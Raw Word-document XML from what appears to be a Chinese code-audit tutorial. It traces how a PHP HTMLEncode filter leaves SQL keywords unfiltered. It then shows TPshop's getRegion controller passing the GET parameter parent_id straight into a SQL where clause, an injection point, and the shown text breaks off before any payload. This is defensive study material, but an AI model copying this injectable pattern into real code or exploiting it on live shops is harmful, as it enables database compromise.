          <v:shape id="_x0000_s10088" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:38.15pt;width:319.25pt;height:264.8pt;z-index:160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pStyle w:val="a3"/>
                    <w:spacing w:before="50" w:line="344" w:lineRule="exact"/>
                    <w:ind w:right="3681"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>function</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTMLEncode($str){ if (!empty($str)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="326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"&amp;","&amp;",$str);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"&gt;","&gt;",$str);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"&lt;","&lt;",$str);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CHR(32)," "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>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CHR(9)," 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CHR(9)," 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CHR(34),""",$str);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CHR(39),"'",$str);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CHR(13),"",$str);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="342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</w:rPr>
                    <w:t>$str=str_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>CHR(10),"",$str);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="342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line="343" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>return</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $str;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="344" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑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spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处理。如果开启的话则用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HTMLEnc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来处理。这里继续来路进这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:after="122" w:line="265" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>看到了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>只拦截了引号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>，空格，并没有拦截类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> and,select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii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6"/>
        <w:spacing w:before="76" w:after="23"/>
        <w:ind w:right="415"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>现在懂了吧，看到输入进来的变量通过什么函数处理，然后一直跟这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个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数，一直到进入数据库为止。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现在有些程序忘记过滤是另外一回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>事，现在的程序而不是找忘记哪里过滤了，而是怎么去绕过了</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii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8"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22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32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="tpshop注入"/>
      <w:bookmarkStart w:id="22" w:name="_bookmark10"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>tpshop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/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Dark' Evil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="310" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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先从头开始分析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="359" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10087" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:19.95pt;width:319.25pt;height:396.25pt;z-index:1624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(extension_loaded('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>zlib')){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420" w:right="251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ob_end_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clean(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); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>ob_start('ob_gzhandler');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342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tabs>
                      <w:tab w:val="left" w:pos="4699"/>
                    </w:tabs>
                    <w:ind w:right="535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 xml:space="preserve">//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检测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PHP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环境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if(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version_compare(PHP_VERSION,'5.3.0','&lt;'))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:tab/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 xml:space="preserve">die('require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PHP &gt; 5.3.0</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia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!');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="359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检测是否已安装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TPshop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系统</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420" w:right="223" w:hanging="42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if(file_exists("./Install/") &amp;&amp; !file_exists("./Install/install.lock")){ if($_SERVER['PHP_SELF'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>] != '/index.php'){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="840" w:right="578"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pP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header(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"Content-type: text/html; charset=utf-8"); exit("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请在域名根目录下安装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,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如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:&lt;br/&gt;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 w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                  </w:pPr>
                  <w:hyperlink r:id="rId22">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>www.xxx.com/index.php</w:t>
                    </w:r>
                  </w:hyperlink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正确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&lt;br/&gt; </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId23">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>www.xxx.com/www/index.php</w:t>
                    </w:r>
                  </w:hyperlink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错误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,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域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名后面不能圈套目录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 xml:space="preserve">,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但项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目没有根目录存放限制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,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可以放在任意目录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,apache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虚拟主机配置一下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即可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");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="42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8" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420" w:right="2231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w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>header(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t xml:space="preserve">'Location:/Install/index.php'); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>exit();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="343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9" w:line="360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error_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reporting(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E_ALL ^ E_NOTICE);//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显示除去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E_NOTICE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之外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的所有错误信息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/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>File:index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="359" w:lineRule="exact"/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10086" type="#_x0000_t202" style="width:319.25pt;height:108.05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 w:eastAsia="微软雅黑"/>
                      <w:sz w:val="21"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pP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 xml:space="preserve">//  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>开启调试模式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 xml:space="preserve">  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>建议开发阶段开启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>部署阶段注释或者设为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>false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define(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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>APP_DEBUG',false);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="2510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 xml:space="preserve">//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定义应用目录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define(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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'APP_PATH','./Application/');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="389"/>
                    </w:tabs>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="3037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ab/>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>定义插件目录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define(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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'PLUGIN_PATH','plugins/');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7"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="32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看到定义的程序目录为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="361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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>define(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>'APP_PATH','./Application/');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pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="713"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10085" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:55.25pt;width:319.25pt;height:324.2pt;z-index:1672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class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ApiController extends Controller {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="42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/*</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="523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 xml:space="preserve">*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获取地区</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="523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*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="420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public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function getRegion(){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="84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 xml:space="preserve">$parent_id =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I(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'get.parent_id');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="84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 xml:space="preserve">$selected =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I(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'get.selected',0);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="84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$data =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M(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'region')-&gt;where("parent_id=$parent_id")-&gt;select();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:ind w:left="840" w:right="3681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 xml:space="preserve">$html = '';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if(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$data){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="17" w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1680" w:right="2231" w:hanging="420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foreach(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$data as $h){ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>if($h['id'] == $selected){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:firstLine="210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html .=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"&lt;option value='{$h['id']}' selected&gt;{$h['name']}&lt;/option&gt;";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="168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8" w:line="360" w:lineRule="exact"/>
                    <w:ind w:firstLine="168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html .=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"&lt;option </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>value='{$h['id']}'&gt;{$h['name']}&lt;/option&gt;";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</w:rPr>
        <w:t>来到这目录下查看一些常用的文件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w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">File:Application/Home/Controller/ApiController.class.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:20</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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10084" type="#_x0000_t202" style="width:319.25pt;height:1in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ind w:left="126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84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840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$html;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="420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spacing w:line="304" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="1839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这里通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>I(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'get.parent_id')` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> thinkphp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的一个写法，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2322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获取的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>之后直接带入了数据库查询：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="852"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>$data =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>M(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>'region')-&gt;where("parent_id=$parent_id")-&gt;select();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pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="6359"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
